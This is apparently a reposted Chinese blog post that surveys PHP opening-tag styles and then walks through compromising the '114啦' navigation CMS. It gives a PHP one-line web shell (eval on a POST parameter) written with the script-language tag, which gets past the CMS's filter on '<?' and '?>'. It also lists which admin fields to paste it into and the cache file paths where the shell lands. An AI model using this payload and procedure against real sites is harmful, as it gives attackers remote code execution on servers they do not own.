首先介紹下php的各種標(biāo)簽：
1)：
<?php ?>
demo:
<?php echo "test";?>
這個(gè)標(biāo)簽現(xiàn)在程序大多都是使用的這種標(biāo)簽！大家都不陌生了，這里就不多介紹了！
2)：
<? echo "test"; ?>
這種標(biāo)簽是在以前很普遍的一種用法php 老版本開(kāi)發(fā)的cms大多都是用的它，
大多程序員都是很熟悉的！我們把這種標(biāo)簽稱為短語(yǔ)標(biāo)簽！
3）：
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
這個(gè)標(biāo)簽是今天的重點(diǎn)，大多都不熟悉的！而且程序員在網(wǎng)站后臺(tái)過(guò)濾插一句話
的時(shí)候往往都是以
“<?,?>”
這兩個(gè)關(guān)鍵字進(jìn)行替換或過(guò)濾的！所以這種標(biāo)簽在后臺(tái)插馬
的時(shí)候用處還是很大的！PS：就是應(yīng)為使用量不大，就不重視！這樣能行嗎？
實(shí)戰(zhàn)：114啦導(dǎo)航準(zhǔn)備我們的一句話代碼：利用script的標(biāo)簽代碼:
<script language="php">eval ($_POST[1]);</script>
首先后臺(tái)我跟晴天那家伙已經(jīng)看完了。他自己的方法也沒(méi)拿下shell模版目錄權(quán)限是只讀！你們懂的！
這里的方法就是利用緩存拿shell.這個(gè)方法是以前公布出來(lái)的。作者具體就不知道是誰(shuí)了（轉(zhuǎn)載亂了）
–官方以及把這里修補(bǔ)了，但是修補(bǔ)方法很馬虎！就是我之前說(shuō)的過(guò)濾關(guān)鍵字只有
<? ?>
所以這里我們可以利用 我們準(zhǔn)備好的script格式的php一句話代碼插入！
名站首行：
HTML內(nèi)輸入一句話，提交后一句話木馬位于admin/data/cache/cache_mztop.php
名站輪播：
站點(diǎn)網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_famous_loop.php
名站切換：
ifreme網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_famous_tab.php
首頁(yè)實(shí)用工具：
工具網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_index_tool.php
本文來(lái)源于：半坑土農(nóng)民'S Blog

香港服務(wù)器租用

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。